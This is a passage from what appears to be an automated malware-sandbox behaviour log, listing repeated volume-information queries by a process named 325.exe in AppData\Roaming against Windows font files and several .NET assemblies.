                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Users\user\AppData\Roaming\325.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
